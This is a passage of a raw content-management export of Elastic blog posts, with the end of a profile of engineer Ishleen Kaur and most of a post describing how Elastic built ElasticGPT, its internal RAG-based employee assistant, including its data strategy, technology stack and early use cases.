growing up, Ishleen’s older brother worked in tech, which further fueled her interest in computer science — so much so that she went on to pursue a bachelor’s degree and a master’s degree in the subject.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHowever, it wasn’t until Ishleen started her first job in the networking domain that she truly understood the impact of her work.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“You don’t realize the impact your code can have,” she says. “But over time, you see how one change in GitHub can shape a customer’s entire technology landscape — for better or worse.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow, as a principal engineer at Elastic, Ishleen works in observability — something that caught her interest because of its intersection of development and operations. Her work on the Observability Integrations team involves building integrations, working on LLM Observability, embedding OpenTelemetry (OTel) into observability solutions, and collaborating across multiple teams to deliver products end to end.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“I help shape the future of observability, ensuring that our solutions provide deep insights into complex systems,” Ishleen says. “I work on challenging problems that have a direct impact on system reliability and performance.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDay to day, Ishleen works on a mix of designing scalable architectures, reviewing code, and problem solving — whether it’s optimizing performance or finding innovative ways to enhance observability solutions.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBeyond her technical responsibilities, Ishleen plays a key leadership role, mentoring junior engineers and guiding projects from start to finish.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“Leadership skills are crucial,” she says. “It’s not just about coding — it's about guiding the team toward a common goal. At a senior level, technical decisions carry weight, and you need the confidence to say, ‘This is the path we’ll take.’ Balancing strategic direction with hands-on coding is key to driving successful outcomes.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIshleen was promoted to principal engineer recently, which has only fueled her ambition to continue growing and contributing. She attributes much of her drive to her parents, who have been a constant source of encouragement and confidence.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“I think I get this push from my parents,” she says. “Especially my dad — he’s always been passionate about my growth, and that belief has given me a lot of confidence.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBut Ishleen’s confidence also comes from within — and has grown over time. She believes in the work she’s doing and has found the confidence to advocate for herself and her work.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“If you’ve done good work, you owe it to yourself to speak up,” she says. “Especially for a woman in tech, making your visibility known is essential.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIshleen encourages other women to speak up, too.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“Don’t be afraid to take up space. Speaking up builds confidence over time. Remember that your perspective is valuable, and bringing your unique experiences to the table can lead to innovative solutions.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eShe also recommends continuing self-improvement and learning from your peers.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“Always keep learning and stay curious — tech is a constantly evolving field, and there’s always something new to explore. One of the best things about working at Elastic is the collaborative culture — there’s so much to learn from your peers, and it helps you grow as an engineer.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIshleen’s biggest motivation is seeing other women in leadership roles. It pushes her forward and fuels her confidence and drive to go for higher leadership roles and take on more responsibility.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“There’s something incredibly powerful about seeing women in leadership positions. It fuels my passion to become one of them.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eHave real impact in your next role. \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://jobs.elastic.co/jobs/department/engineering?\u0026utm_source=http://elastic.co/\u0026utm_medium=referral\u0026utm_campaign=eb-wit\u0026utm_content=ishleen-blog\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBrowse open jobs\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003e.\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 8pt;'\u003e\u003cem\u003eElastic, Elasticsearch and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"csd3012ff38a99ca30"}}],"_metadata":{"uid":"cs2008573911375533"}}}],"publish_date":"2024-12-05","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[{"uid":"bltb45e90791ca95e3b","_content_type_uid":"tags_culture"}],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt49fa2cbc3c6cc20e","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-04T20:44:50.317Z","created_by":"blte369ea3bcd6ac892","file_size":"154956","filename":"167117-wit-ishleenkaur_LinkedIn_Banner_720x420_White_1.png","parent_uid":null,"tags":[],"title":"167117-wit-ishleenkaur_LinkedIn Banner_720x420_White 1.png","updated_at":"2024-12-04T20:44:50.317Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2024-12-05T15:00:01.206Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt49fa2cbc3c6cc20e/6750bf42c21e60fa632649f4/167117-wit-ishleenkaur_LinkedIn_Banner_720x420_White_1.png"},"title":"Ishleen Kaur on making an impact in tech","title_l10n":"Ishleen Kaur on making an impact in tech","updated_at":"2024-12-04T20:45:48.348Z","updated_by":"blte369ea3bcd6ac892","url":"/blog/culture-making-impact-tech","publish_details":{"time":"2024-12-05T15:00:01.194Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltbb8cf3c0ac021c82","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"ElasticGPT is a generative AI assistant designed to help Elastic employees quickly find information and answers from company data. Teams can use ElasticGPT via a self-service experience to summarize, categorize, and analyze information and data.","author":["bltc377310d5111b252"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-12-04T15:16:47.692Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdb2209fed9f797e4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLike all organizations, Elastic deals with an ever-increasing volume of information and data, making it harder for our teams to keep information up to date and for employees to find answers from relevant resources.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs a leading Search AI company, our approach to customer-first starts with customer zero — us. When our employees needed a better way to find the information necessary to do their jobs, we knew we could use our own technology to bring that vision to life.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style='font-size: 12pt;'\u003eFast-forward to today, and we have launched our internal generative AI assistant, ElasticGPT, that helps employees quickly find relevant information and boost workforce productivity. It runs on the Elastic Search AI Platform and uses our vector database, Elastic Cloud deployment, Elasticsearch, Elastic Observability, and enterprise connectors. It also uses our proprietary data through \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/retrieval-augmented-generation\"\u003e\u003cspan style='font-size: 12pt;'\u003eretrieval augmented generation (RAG)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to add context and relevance to answers.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The start of our AI journey","_metadata":{"uid":"csa457a55ae606d404"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic’s IT team plays a foundational role in accelerating technology initiatives. And over the past 18 months, the focus has been geared toward enabling generative AI technology across the organization to improve employee efficiency. This includes several homegrown generative AI tools and capabilities as well as new and emerging innovations added across our enterprise offering.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThroughout this journey, multiple business functions came together to identify the opportunity to use generative AI for employee experience, but several questions arose as we evolved in this space. These included:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow can Elasticsearch combine with generative AI to \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003emake it easier for employees to find information across our enterprise data sources and systems?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow do we bridge private company information with the power of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/large-language-models\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003elarge language models\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (LLMs) to generate relevant results while maintaining security and confidentiality?\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCan we build a scalable solution that serves as a platform for multiple use cases while offering us the flexibility to use multiple LLMs? And how can we promote domain-specific innovation by providing this as a managed service across our organization?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow can we enable capabilities to address time-consuming and redundant requests by introducing self-service workflows that deliver capacity gains across teams?\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow can we avoid technical debt by optimizing spend, managing risk, and mitigating tool sprawl?\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOur core objective was simple: \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eBuild an internal, private, and secure generative AI tool using the Elastic Search AI Platform that can benefit all Elasticians for information retrieval and knowledge discovery.\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eConsidering we are Elastic, we knew how Elasticsearch’s product capabilities would complement the AI capabilities we wanted to implement. That said, the immediate challenge was honing in on the most impactful use cases, defining our data strategy, and remaining laser-focused on our core vision.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Building our data strategy","_metadata":{"uid":"cs2f10fe18bd43323c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith our goal to build a solution that would benefit all Elastic employees, we knew we needed to start by examining what data sources would make it into our minimum viable product (MVP). We narrowed it down to two criteria: 1) the data sources should have detailed information that would benefit all employees, and 2) the data needs to be up to date so that relevant, real-time information is retrieved in the outputs. We landed on two data sources for our MVP:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eConfluence data:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Our internal Confluence site, Elastic Wiki, is a comprehensive internal resource for all things related to Elastic, including detailed information on our products, teams, technology, processes, policies, and company culture.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eServiceNow data:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e We use ServiceNow knowledge articles to help address questions across various topics like policies, usage instructions, troubleshooting tips, and requesting support from teams like IT and HR.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIdentifying the two data sources was simple, but governance was not as easy. Why?\u0026nbsp; Like most organizations with petabytes of data, we had lots of information in various locations, and we weren’t confident about data accuracy. This multidimensional problem was critical to solve to make sure that the quality of response was not negatively impacted by “dirty” or “noisy” data.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo tackle our data challenges, we developed a step-by-step framework:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 1: Capture and organize data.\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e This entailed taking inventory of our data sources, organizing our information, and defining how and where this data would be used.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 2: Ensure data accuracy and relevancy. \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eWe had to define what information was reliable, so we built data criteria that classified information as “stale” (e.g., information that has not been updated for a defined period, artifacts without owners) and put forward a plan to archive this stale information or update it. This was critical to making sure that our RAG-based approach and architecture would be successful. RAG can manage conflicting information by actively retrieving the most up-to-date and relevant information across data sources to answer a query. Focusing on our data quality allowed us to ensure that answers to queries were reliable and trustworthy.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 3: Set ourselves up for the future.\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e While we planned to start with two data sources, we knew this would grow over time. Getting our data governance framework in place early would help us grow faster as we scale.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs103dfb653d54e78c"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"csd777458ddb43f45a"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eTip: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eInvesting in building the right data strategy and governance is crucial to ensure the quality and relevance of the data, leading to more accurate and reliable outputs. A well-defined data strategy can also aid in managing data privacy and compliance, which is essential for maintaining user trust and adhering to regulatory requirements. This is crucial as you scale your tool or generative AI program, as it provides a framework for the features and capabilities you will or will not incorporate.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs358e176ef9129a63"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce we aligned across our core team and stakeholders, we started to build our proof of concept that would allow us to experiment, iterate, and move quickly in line with our source code tenet, “\u003c/span\u003e\u003ca href=\"https://www.elastic.co/about/our-source-code\"\u003e\u003cspan style='font-size: 12pt;'\u003eProgress, SIMPLE Perfection\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.”\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Meet ElasticGPT","_metadata":{"uid":"cse68e8d7892fec29b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticGPT — our generative AI employee assistant built on a RAG framework — is designed to help Elasticians retrieve relevant information from natural language queries and offers efficient ways to summarize information for day-to-day tasks. With the two main proprietary data sources and company-wide information from our internal tools — Confluence and ServiceNow — users can easily find answers instead of searching across multiple sources for information.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn the past, someone like John would spend their time (and often others’) trying to find information quickly.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8328a87674a53d79"}}},{"image":{"image":{"uid":"blt36706bcf3ecdf31b","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-04T15:16:42.528Z","updated_at":"2024-12-04T15:16:42.528Z","content_type":"image/png","file_size":"101491","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-04T16:19:59.857Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt36706bcf3ecdf31b/6750725ae1f088d05095f82e/image2.png"},"_metadata":{"uid":"csdbaf1c3a86cc114c"},"caption_l10n":"","alt_text_l10n":"Past state: Elastic Workforce INefficiency","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0dea3a1ef6fa6648"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBut now, John uses ElasticGPT to self-serve and find information.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs51fa5a3f28548c1c"}}},{"image":{"image":{"uid":"blt3a2de66953767488","_version":1,"title":"Screenshot 2024-12-04 at 10.16.21 AM.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-04T15:16:32.035Z","updated_at":"2024-12-04T15:16:32.035Z","content_type":"image/png","file_size":"656441","filename":"Screenshot_2024-12-04_at_10.16.21_AM.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-04T16:19:59.981Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3a2de66953767488/675072505a3b430fac35ea09/Screenshot_2024-12-04_at_10.16.21_AM.png"},"_metadata":{"uid":"cs8bee203c977a110e"},"caption_l10n":"","alt_text_l10n":"Elasticsearch solution brief inquiry","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs52b9c626250931d7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith ElasticGPT, someone like John can now quickly access information and answers without spending too much time looking for information or reaching out to multiple Elasticians, recouping his and others' time to focus on more strategic work.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The technology behind ElasticGPT","_metadata":{"uid":"cs31337603c611d180"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElasticGPT is powered by multiple products and capabilities built on the Elastic Search AI Platform. This includes Elasticsearch, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/vector-database\"\u003e\u003cspan style='font-size: 12pt;'\u003ea vector database\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/semantic-search\"\u003e\u003cspan style='font-size: 12pt;'\u003esemantic search\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, enterprise connectors, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/observability\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/application-performance-monitoring\"\u003e\u003cspan style='font-size: 12pt;'\u003eapplication performance monitoring\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e (APM), and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/kibana\"\u003e\u003cspan style='font-size: 12pt;'\u003eKibana\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Each of these capabilities plays a special role in developing and monitoring ElasticGPT and allows us to use a RAG technique to build a reliable and accurate solution that securely uses confidential and proprietary data. These capabilities on the Elastic Search AI Platform are now known as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/partners/ai-ecosystem\"\u003e\u003cspan style='font-size: 12pt;'\u003ethe Elastic AI Ecosystem\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEach of our Search AI Platform’s capabilities on our enterprise offering plays a crucial role in building out this solution:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElastic Cloud:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Our IT organization uses Google Cloud Platform (GCP) and Microsoft Azure Services for existing infrastructure. We used Elastic Cloud on GCP to build ElasticGPT.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEnterprise connectors:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e We used our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/es-native-connectors.html\"\u003e\u003cspan style='font-size: 12pt;'\u003emanaged connectors to ingest our data sources (Confluence and BigQuery for ServiceNow) into Elastic.\u0026nbsp;\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElasticsearch: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eUsing Elasticsearch as a vector database, we could easily break down data via a “chunking” process to help generative AI handle large volumes of data and deliver effective responses. With semantic search and vector search, we could efficiently retrieve the most relevant answers for conversation context. And with Elasticsearch’s storage capabilities, we could store all conversations and associated metadata like time stamps and user feedback in real time.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElastic Observability: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eUsing our Elastic Observability stack, we implemented APM to track the performance and health of ElasticGPT. This includes capturing response times, error rates, and resource utilization to help us identify and resolve bottlenecks impacting the user experience.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInformation security: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eTo keep our data secure and compliant with our security policies, we implemented robust security measures, including an SSO authentication for all Elasticians.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKibana: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eWith access to APM’s real user monitoring (RUM) data, we can collect metrics —\u0026nbsp;such as user engagement, total conversations, failures, reported chats, model usage, and other key details — to track usage, performance, and other KPIs for ElasticGPT.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen building ElasticGPT, we used our Microsoft Azure OpenAI subscription to integrate LLMs, such as GPT-4o and GPT-4o-mini, into our solution. Elasticsearch retrieves the query context, which is then passed to these LLMs, enabling them to generate highly relevant and readable text answers. Elasticsearch also made it easy to store additional context with each interaction, including the specific LLM model used, conversation threads, source references, and user feedback.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy deploying on Kubernetes, we were able to ensure scalability and reliability by taking advantage of automated scaling based on demand, zero-downtime deployments, and comprehensive monitoring through Elastic Observability.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Transforming the way we work","_metadata":{"uid":"csde9753d38964ebdb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this first phase of ElasticGPT, Elasticians globally are using the generative AI experience to find relevant information. Since the first 90 days of launch, we successfully answered nearly 10K queries with ElasticGPT and saw a 99% satisfaction rate based on chat feedback. The business impact of ElasticGPT is often dependent on the particular case. However, across the organization, Elasticians are empowered with this self-service experience to boost efficiency. Not only does this help field redundant questions or requests across the organization, but it can also lead to reduced support tickets for shared service teams, such as HR and IT.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere are many use cases where employees use this tool as part of their daily workflows to summarize information, analyze data sets, generate drafts, and simply spark their creativity. Here are some specific use cases we’re seeing from early usage across the organization:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e1. Product enablement: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eNew hires use ElasticGPT to learn about our products and feature capabilities while existing employees catch up with Elastic’s innovation velocity, especially new releases and launches.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfaa8c86708e46644"}}},{"quotes":{"quote_l10n":"Working within the Marketing team, I’ve started using ElasticGPT to validate the technical capabilities of specific product features when writing content.","_metadata":{"uid":"cs335627976e41c712"},"quote_author_l10n":"Product Marketing","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs97dc368b35c6b932"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e2. HR, IT, Legal, and company information: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eUsers can pose questions, such as, “How do I request access to specific tools?”; “Where can I find my benefits information?”; “What is our travel and expense policy?”; or, “When is our December holiday party?”\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0848f5072583ba08"}}},{"quotes":{"quote_l10n":"I had someone on my team who got married and needed to change her last name. I used ElasticGPT to find out how to update her Elastic benefits with her name change.","_metadata":{"uid":"cs59ad51427a1e431a"},"quote_author_l10n":"Legal operations","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8b6bb9f5707aec2e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e3. Sales operations: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eUsers across our sales organization are using ElasticGPT to find and better understand our sales motions, processes, and key contacts. Users can find playbooks and make informed decisions on when to engage ancillary teams and what resources are available. Support sales teams, such as Deal Desk or Order Operations, also use ElasticGPT for following through internal processes.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6df04a706b4238e6"}}},{"quotes":{"quote_l10n":"I constantly see new sales motions in play for particular target segments. It’s so easy to use ElasticGPT to catch up on the latest and greatest material.","_metadata":{"uid":"csd900b94973e72ecf"},"quote_author_l10n":"Account executive","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa945ad2019bc372a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e4. Analysis: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eWe’ve seen multiple\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eElasticGPT chats where teams use ElasticGPT to summarize large articles or data sets.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’ve also observed a flywheel effect when enabling ElasticGPT. As employees come across outdated information in the 